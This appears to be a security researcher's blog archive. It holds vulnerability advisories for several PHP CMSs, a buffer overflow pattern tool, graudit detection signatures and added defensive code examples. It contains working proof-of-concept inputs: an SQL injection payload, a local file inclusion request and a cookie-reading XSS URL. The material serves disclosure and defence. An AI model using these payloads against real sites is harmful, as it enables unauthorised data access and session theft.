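The two controls missing from the three snippets above, written out as an added Python example (not Feindura's code; the web root and language directory used in the demo are assumed). download.php and the filemanager need a base-path restriction: resolve the user's path beneath the permitted directory and refuse anything that ends up outside it. The language include needs an allow-list: build the include path from a validated code, never from the raw session value.

```python
import os
import re

class PathEscape(ValueError):
    """Raised when a user-supplied value would leave the permitted directory."""

def safe_join(base: str, user_path: str) -> str:
    """Resolve user_path beneath base and refuse anything outside it. realpath()
    resolves '..', duplicate slashes and symlinks, so a link planted inside base
    that points elsewhere is rejected too. user_path is expected to be already
    percent-decoded (as PHP's $_GET values are) and relative."""
    if os.path.isabs(user_path):
        raise PathEscape(user_path)
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, user_path))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise PathEscape(user_path)
    return candidate

def is_contained(base: str, user_path: str) -> bool:
    try:
        safe_join(base, user_path)
        return True
    except PathEscape:
        return False

# Allow-list for the language selector: two lowercase letters, optional _CC region.
_LANG = re.compile(r"[a-z]{2}(?:_[A-Z]{2})?")

def valid_lang(lang: str) -> bool:
    return _LANG.fullmatch(lang) is not None

def lang_file(lang: str, lang_dir: str) -> str:
    """Only a validated code ever reaches the path; a trailing NUL or '../' in the
    session value is refused here rather than interpreted by include()."""
    if not valid_lang(lang):
        raise PathEscape(lang)
    return os.path.join(lang_dir, f"{lang}.backend.php")

if __name__ == "__main__":
    root = "/srv/example-docroot"            # assumed web root, not from the advisory
    for p in ("files/report.pdf", "../../etc/passwd",
              "files/../../../../etc/passwd", "/etc/passwd"):
        print(f"{p:36} {'ok' if is_contained(root, p) else 'REJECTED'}")
    for code in ("en", "de_DE", "../../../etc/passwd", "en\x00"):
        print(f"{code!r:28} {'ok' if valid_lang(code) else 'REJECTED'}")
```

The prefix comparison is done on `commonpath` of the resolved paths, not on a string `startswith`, so a sibling directory such as `/srv/example-docroot2` cannot pass. Allow-listing the language code also closes the truncation trick that affected PHP before 5.3.4, where a `%00` in the value cut off the `.backend.php` suffix.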

--- Solution ---
Password protect your feindura installation.
These issues are fixed in the coming 1.1 version.

--- Disclosure time line ---
28-Oct-2010 - Public disclosure
18-Oct-2010 - Vendor response
18-Oct-2010 - Vendor notified through email

Buffer overflow pattern tool

I can't help feeling like an arrogant bastard writing this post. It is not my intention to discredit the work of others. I have tremendous respect for the skill of people who do reverse engineering and exploit development.

I have been working on (learning) exploit writing lately and although I had heard about it before I hadn't actually used the pattern generator approach. Being a perl man I decided I wanted to grab a perl based generator so I could modify it to suit my own needs. A quick google later I found Wasim Halani's perl implementation. After a quick play with that I decided that I should just write my own.
My first run produced a similar looking string, but my 1024th character was off by one. I decided to compare the two strings and found the difference at byte 781. Washal's implementation appends the uppercase character before incrementing the uppercase character, ie: "7Az8Az9ABa0" instead of "7Az8Az9Ba0". Comparing it to metasploit's tools/pattern_create.rb mine was spot on. I decided to take it all the way to the end for comparison so I generated a 20280 character string from both tools and compared them. This time there was a difference at byte 20278, metasploit produced "Zz8Aa0" as the last six characters compared to my "Zz8Zz9". I consider my behaviour to be correct and reported the bug.

Furthermore, once you go past 20280 characters the pattern starts repeating. My tool relies on the perl string incrementer and that changes the pattern from three to four characters in my tool. I tend to lean to my behaviour as correct, especially when dealing with 8 byte addresses, but I am completely biased. So without any further ado, here is my implementation of the buffer overflow pattern generator.

# Buffer Overflow Pattern generator v 1.0
# Written by Wireghoul -
use strict;
use warnings;

# Build the pattern by appending Aa0, Aa1, ... and letting Perl's magic string
# increment carry over (Zz9 -> AAa0), then trim to the requested size
sub generate {
    my $len=shift;
    my $pattern='Aa0';
    my $out = '';
    while (length($out) < $len) {
        $out .= $pattern;
        $pattern++;
    }
    return substr($out,0,$len);
}

sub search {
    my $string = shift;
    # If we get a hex string, decode and reverse it (little endian register value)
    if ($string =~ /0x/) {
        $string =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;
        $string =~ s/0x//;
        $string = reverse $string;
    }
    my $pat = 'Aa0';
    my $out = '';
    # Grow the pattern until the string appears, then report its offset
    while ($out !~ m/\Q$string\E/) {
        $out .= $pat;
        $pat++;
    }
    return index($out, $string);
}

if (!$ARGV[0]) {
   print "Buffer overflow pattern generator by Wireghoul\n$0 <size> creates pattern of size characters\n$0 string finds offset of string in pattern\n";
   exit 0 ;
}
if ($ARGV[0] =~ m/^\d+$/) {
    print generate($ARGV[0])."\n";
} else {
    print search($ARGV[0])."\n";
}
I'll finish with some examples of usage:
~/challenge$ ./vuln `bop 1025`
Segmentation fault
~/challenge$ bop 0x42306942
1020
~/challenge$ bop Bi0B
1020
1020+length("Bi0B") = 1024 in case that wasn't clear. I hope you'll enjoy the tool.
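
The same generator in Python, added here as an example (it is a port of the idea, not bop itself): Perl's magic string increment is spelled out, the little-endian decoding of a register value is explicit, and `pattern_offset` returns every match rather than the first so the ambiguity argument above can be seen. `wrap=True` models a generator that simply restarts at Aa0 after 20280 characters (plain wrapping, not the off-by-one the post reports in metasploit's tool).

```python
def perl_increment(s: str) -> str:
    """Perl's magic string increment: 'Aa0' -> 'Aa1', 'Aa9' -> 'Ab0', 'Az9' -> 'Ba0',
    and when the leftmost character overflows a new one of the same class is
    prepended, so 'Zz9' -> 'AAa0'."""
    chars = list(s)
    i = len(chars) - 1
    while i >= 0:
        c = chars[i]
        if c == "z":
            chars[i] = "a"
        elif c == "Z":
            chars[i] = "A"
        elif c == "9":
            chars[i] = "0"
        else:
            chars[i] = chr(ord(c) + 1)
            return "".join(chars)
        i -= 1
    first = s[0]
    chars.insert(0, "A" if first.isupper() else "a" if first.islower() else "1")
    return "".join(chars)

def pattern_create(length: int, wrap: bool = False) -> str:
    """Aa0Aa1...Zz9 is 20280 characters. Past that, wrap=False keeps incrementing
    into the four-character AAa0, AAa1, ... as bop does; wrap=True restarts at Aa0."""
    parts, total, chunk = [], 0, "Aa0"
    while total < length:
        parts.append(chunk)
        total += len(chunk)
        chunk = perl_increment(chunk)
        if wrap and chunk == "AAa0":
            chunk = "Aa0"
    return "".join(parts)[:length]

def needle_from(value: str) -> str:
    """Accept the literal substring or a register value such as 0x42306942; the
    value is little-endian in memory, so its bytes are reversed (here 'Bi0B')."""
    if value.lower().startswith("0x"):
        return bytes.fromhex(value[2:])[::-1].decode("ascii")
    return value

def pattern_offset(value: str, length: int = 20280, wrap: bool = False) -> list:
    """All offsets at which the needle occurs. One answer is what you want; more
    than one means the pattern is ambiguous at that length and needle size."""
    needle, hay = needle_from(value), pattern_create(length, wrap)
    offsets, i = [], hay.find(needle)
    while i != -1:
        offsets.append(i)
        i = hay.find(needle, i + 1)
    return offsets

if __name__ == "__main__":
    print(pattern_create(1025)[-12:])
    print("Bi0B at", pattern_offset("Bi0B"), "and 0x42306942 at", pattern_offset("0x42306942"))
    print("Aa0A in a 20284-byte pattern: extend", pattern_offset("Aa0A", 20284),
          "wrap", pattern_offset("Aa0A", 20284, wrap=True))
```

With a wrapping generator the four bytes `Aa0A` occur at offset 0 and again at 20280, so a crash past the 20280 mark cannot be located from a 32-bit register alone; with the extending scheme the same search gives one answer. Either way, confirm an offset by regenerating the buffer with a marker at that position before building on it.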

Custom graudit signatures

Writing your own graudit signatures is relatively easy. Mastering regular expressions can be helpful, but in their simplest form a list of words will do. I have tried to document some of the common pitfalls that might creep up on you in my Ruxmon presentation, but I know how "useful" a single slide can be. I am catching up on graudit documentation and signature documentation is just around the corner. Until then, I thought I would share with you some of the databases I use when looking for low hanging fruit and want to reduce the information overload (noise) that you normally get from the php ruleset. Signatures after the break to avoid spamming rss readers.
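
As an added example of what such a database looks like and how it is applied (not graudit's own code or its shipped php signatures), here is a small Python scanner with a handful of constructed one-regex-per-line signatures for bug classes common in PHP code, several of which appear in the advisories above: request or session data inside include/readfile calls, request data concatenated into a query, the strpos() truthiness gotcha from the Chyrp advisory, PHP_SELF echoed into markup, and a header('Location:') redirect that nothing stops. The sample source is constructed, modelled on the quoted snippets.

```python
import re

# Constructed signature database: one extended regex per line, '#' lines are comments.
SIGNATURES = r"""
# request/session data flowing straight into a file or include call
(include|include_once|require|require_once|readfile|fopen|file_get_contents)\s*\(.*\$_(GET|POST|REQUEST|COOKIE|SESSION|SERVER)
# request data concatenated into a query
(mysql_query|mysqli_query|->query)\s*\(.*\$_(GET|POST|REQUEST|COOKIE)
# a redirect is not a return: code after header() still runs unless the script exits
header\s*\(\s*["']Location:
# strpos() used as a boolean; a match at position 0 is falsy in PHP
if\s*\(\s*!?\s*strpos\s*\(
# PHP_SELF echoed into markup without encoding
echo\s.*\$_SERVER\['PHP_SELF'\]
"""

def load_signatures(text: str):
    return [re.compile(line.strip()) for line in text.splitlines()
            if line.strip() and not line.lstrip().startswith("#")]

def scan(source: str, sigs, filename: str = "stdin"):
    """grep -nE style: one (filename, line number, line) per line matching any rule."""
    hits = []
    for no, line in enumerate(source.splitlines(), 1):
        if any(sig.search(line) for sig in sigs):
            hits.append((filename, no, line.strip()))
    return hits

def redirects_without_exit(source: str, window: int = 2):
    """Follow-up for the Location: rule, which a line-based grep cannot express:
    line numbers of redirects with no exit()/die() within the next `window` lines."""
    lines = source.splitlines()
    found = []
    for i, line in enumerate(lines):
        if re.search(r"""header\s*\(\s*["']Location:""", line):
            if not re.search(r"\b(exit|die)\b", " ".join(lines[i + 1:i + 1 + window])):
                found.append(i + 1)
    return found

# Constructed sample, modelled on the snippets quoted in the advisories above.
SAMPLE_PHP = r"""<?php
$category = $_GET['category'];
echo '<form action="'.$_SERVER['PHP_SELF'].'?category='.$category.'" method="post">';
readfile(DOCROOT.$adminConfig['savePath'].$_GET['file']);
$langFile = include(dirname(__FILE__).'/lang/'.$_SESSION['language'].'.backend.php');
if (strpos($file, '..')) { die('traversal'); }
$rows = mysql_query("SELECT * FROM pages WHERE id=".$_GET['page']);
if (empty($is_admin)) {
    header("Location: login.php");
}
list_users();
if (empty($is_admin)) {
    header("Location: /admin/login.php");
    exit;
}
"""

def hit_lines(source: str = SAMPLE_PHP):
    return [no for _, no, _ in scan(source, load_signatures(SIGNATURES))]

if __name__ == "__main__":
    for fn, no, line in scan(SAMPLE_PHP, load_signatures(SIGNATURES), "sample.php"):
        print(f"{fn}:{no}: {line}")
    print("redirects that do not stop the script:", redirects_without_exit(SAMPLE_PHP))
```

Signatures of this kind trade precision for speed: line 2 of the sample (`$category = $_GET[...]`) is the real source of the XSS but is not flagged, only the echo is, because a per-line regex cannot follow the variable. That is the right trade for a first pass over a code base; the hits are a reading list, not findings.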

Tool review: Bugle

Bugle is a neat tool which uses google and regular expressions to detect security defects in code. It makes it super quick to find vulnerable code.

The downside is that the code is often old and the vulnerability has been found, disclosed and fixed. And checking all those hits take time. Still it is well worth a spin.

Bugle's use of regular expressions to locate code defects was what initially prompted me to organize my messy scripts into the open source script graudit.

Security roulette

I had some spare time, so I created a little game. I've called it security roulette. The object is to find as many web application security flaws as you can in a given number of websites in a limited timeframe. The number of websites is determined by google and the time limit is self imposed or agreed to if you are challenging someone.

I wrote a quick mashup to help you play. The scorecard could probably use some tweaking. My suggested house rule is "no browser plugins or third party applications allowed".

Security roulette

Security roulette is a simple game I have made up, the instructions are provided once you start. Use the form below to get started.

20100625 - : Multiple vulnerabilities in maiacms
JAHx103 -

MaiaCMS is an open source PHP based content management system (CMS). It is designed with simplicity in mind to help you easily build and maintain your web site. It is freely available to everyone.
[ Taken from: ]

--- Vulnerability description ---
Multiple vulnerabilities exist in maiacms, here are some of them.

Discovered by: Eldar "Wireghoul" Marcussen
Severity: Low
Release: Full disclosure
Affected versions: 0.1

--- SQL injection ---
The index.php script does not properly sanitize the page parameter, resulting in several paths to SQL injection.
/index.php?page=1' or 'a'='a

--- Local file inclusion ---
The admin/index.php script does not properly sanitize the com or file parameters, resulting in local file inclusion.

--- Authentication bypass ---
Most of the admin pages have a check-and-redirect-to-login snippet to validate the login:
list_pages.php:2:    require ("../includes/connections.php"); //Includes functions and database connection
list_pages.php:4:    if (empty($is_admin)) {
list_pages.php:5:        header("Location: login.php");
list_pages.php:6:    }
However it does not halt execution after the header redirect. This allows code to be executed past the point of redirection.

curl ''

--- Session control ---
The script update_session.php relies on the aforementioned access control weakness and allows the session data to be changed or created directly through an HTTP POST operation.
update_session.php:4:if (empty($is_admin)) {
update_session.php:5:        header("Location: /admin/login.php");
update_session.php:6:    }
update_session.php:8:foreach ($_POST as $key => $value) {
update_session.php:9:    $_SESSION[$key] = $value;

--- Solution ---
Wait for the next or non alpha release

--- Disclosure time line ---
25-Jun-2010 - Public disclosure
25-Jun-2010 - Vendor notified through email
25-Jun-2010 - Vendor response

20100205 - : HuskiCMS local file inclusion
JAHx102 -

huski CMS effectively places the control of the website back into the hands of you, the site owner. huski CMS is extremely user friendly and has been developed with the lowest denominator in IT knowledge in mind. huski CMS is still a very powerful and flexible system which ensures your site is using the latest technologies such as AJAX, XML, XHTML, and CSS
[ Taken from: ]

--- Vulnerability description ---
A conditional local file inclusion exists in the i parameter of the image resizing script size.php.
The parameter is not filtered, so any file readable by the web server can be included; the proof of concept below uses it to retrieve the source of index.php.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Local File Inclusion
Severity: Low
Release: Responsible
CVE: None
Vendor: ASCET Interactive -
Affected versions:

--- Proof of Concept ---
~$ GET 'http://[target]/size.php?i=index.php'
    header ('Content-Type: text/html; charset=utf-8');
    // Data Includes
    include_once "PHPLib/";
    include_once "Data/dbConnection.class.php";
    include_once "Data/dbConfig.class.php";
    include_once "Data/dataAdapter.class.php";
    include_once "Quicksite/Core/domxml.class.php";

    // Quicksite Core Includes
    include_once "Quicksite/Core/";
    // Configuration
    include_once "Quicksite/db.config.php";
    include_once "inc/vars.config.php";

    // Initialise the Site
    $site = new Site($_VARS['site']);
    // Initialise the Page
    $page = new Page($site, $_GET['id'], array_merge($_POST, $_GET));

    // Load plugin sources
    // Create the Page
    echo $page->Result;
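
The following is an added example, not huski CMS code, of how a resizing script can validate a file-name parameter such as i before reading the file: the name is reduced to its basename, checked against an allow-list of image extensions, and its realpath() is required to sit inside one image directory. The directory name and the readfile()-based output are assumptions.

```php
<?php
// Added example, not huski CMS code. A file name taken from the request is
// only accepted if it resolves to an existing image inside one directory.

// Assumption: site images live under this directory.
const IMAGE_DIR = __DIR__ . '/images';
const IMAGE_TYPES = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                     'png' => 'image/png', 'gif' => 'image/gif'];

/**
 * Resolve a user-supplied image name to an absolute path inside IMAGE_DIR,
 * or null if it is missing, outside the directory, or not an allowed type.
 * Traversal (../), absolute paths and php:// style wrappers all fail: the
 * basename() strips any directory part, and anything that still resolves
 * outside IMAGE_DIR is rejected by the prefix check on realpath().
 */
function resolve_image(string $name): ?string
{
    $base = realpath(IMAGE_DIR);
    if ($base === false) {
        return null;
    }
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!isset(IMAGE_TYPES[$ext])) {
        return null;   // index.php, .htaccess, config files: wrong extension
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . basename($name));
    if ($path === false || !is_file($path)) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;   // symlink or other escape from IMAGE_DIR
    }
    return $path;
}

$path = resolve_image((string)($_GET['i'] ?? ''));
if ($path === null) {
    http_response_code(404);
    exit;
}
header('Content-Type: ' . IMAGE_TYPES[strtolower(pathinfo($path, PATHINFO_EXTENSION))]);
readfile($path);   // resizing omitted; the point is the path check above
```

The extension check alone is not enough (a symlink named photo.jpg can point anywhere), which is why the resolved path is also compared against the directory prefix.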

--- Solution ---
Upgrade to a more recent version

--- Disclosure time line ---
05-Feb-2010 - Public disclosure
29-Jan-2010 - Vendor acknowledge vulnerability
28-Jan-2010 - Vendor notified through email

20100205 - : Huski retail multiple SQL injection vulnerabilities
JAHx101 -

Huski Retail
Ascet Interactive offers you a very simple and cost effective method of selling goods and services online. Ascet Interactive provides you with a catalogue targeted at your customers, whether they are retail customers or your dealer network. Imagine being able to save on printing, faxing and administration costs by making your whole product range available at anytime via the Web.
[ Taken from: ]

--- Vulnerability description ---
The categoryID and productID parameters used in several pages are not sufficiently sanitised, leading to SQL injection.

Discovered by: Eldar "Wireghoul" Marcussen
Type: SQL Injection
Severity: Low
Release: Responsible
CVE: None
Vendor: ASCET Interactive -
Affected versions:

--- Exploit URI ---




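Added example (not code from MaiaCMS or Huski Retail) covering the page parameter in the MaiaCMS advisory above and the categoryID and productID parameters here. Against an in-memory SQLite table it shows why the 1' or 'a'='a payload returns every row, unpublished ones included, when the value is spliced into the query text, and how a bound parameter or an integer cast stops it. Table and column names are constructed for the example; it needs the pdo_sqlite extension.

```php
<?php
// Added example, not code from MaiaCMS or Huski Retail. The table and rows
// are constructed for the demonstration.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)');
$db->exec("INSERT INTO pages VALUES (1, 'Home', 1), (2, 'Draft', 0), (3, 'Admin notes', 0)");

// Vulnerable: the request value is spliced into the SQL text. With the
// MaiaCMS payload the WHERE clause becomes
//     published=1 AND id='1' or 'a'='a'
// and since AND binds tighter than OR the 'a'='a' branch is always true,
// so every row comes back, including the unpublished ones.
function lookup_vulnerable(PDO $db, string $page): array
{
    $sql = "SELECT id, title FROM pages WHERE published=1 AND id='$page'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed: the value travels as a bound parameter, so it is compared as data
// and can never change the statement's structure.
function lookup_safe(PDO $db, string $page): array
{
    $stmt = $db->prepare('SELECT id, title FROM pages WHERE published=1 AND id=:id');
    $stmt->execute([':id' => $page]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// For purely numeric identifiers (categoryID, productID) an integer cast is
// a second, independent line of defence: non-numeric input collapses to 0,
// and a numeric prefix such as "1' or ..." collapses to 1.
function lookup_by_int(PDO $db, string $id): array
{
    $stmt = $db->prepare('SELECT id, title FROM pages WHERE published=1 AND id=?');
    $stmt->execute([(int)$id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$payload = "1' or 'a'='a";
printf("vulnerable: %d rows\n", count(lookup_vulnerable($db, $payload)));
printf("bound:      %d rows\n", count(lookup_safe($db, $payload)));
printf("int cast:   %d rows\n", count(lookup_by_int($db, $payload)));
```

The concatenated query returns all three rows, the bound query none (the literal string matches no id), and the cast query only the published page with id 1.
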
--- Solution ---
Contact the vendor for a fix

--- Disclosure time line ---
05-Feb-2010 - Public disclosure
29-Jan-2010 - Vendor acknowledge vulnerability
28-Jan-2010 - Vendor notified through email

Bank of Queensland XSS



I found an XSS vulnerability in ING's Australian website. [ Screenshot: ING - XSS - PoC.jpg ]
The proof-of-concept URL used to illustrate the vulnerability is:;alert(document.cookie);test=%27

XSS defacement mirror

Since appears to be out of action, there seems to be a need for an active XSS defacement mirror. Some alternatives exist, such as the original XSS disclosure thread on or. However, these two sites don't offer the ease of use that did for reporting XSS.

If cannot be brought back to life, this is what I would like to see in a defacement mirror:

  • Ability to submit POST and cookie data, or even Tamper Data XML
  • Automatic screen/browser-shot of the hole
  • Some level of community control to minimize the number of holes that need to be moderated by admins
  • Automatic notification to the domain owner using postmaster, hostmaster, abuse, etc
  • Status indicator (validated, fixed, etc)
  • Automatic submission and validation by script src=http://xss-mirror/subandvalidate.js?username or similar technique
  • Published statistics; users, vulns, fixed, etc
I understand that there might be a business model involved here and things might not turn out quite like I had wished. Hopefully someone will take up the torch and either bring xssed back to life or start a new site to fill the gap left behind.
This weblog is licensed under a Creative Commons License.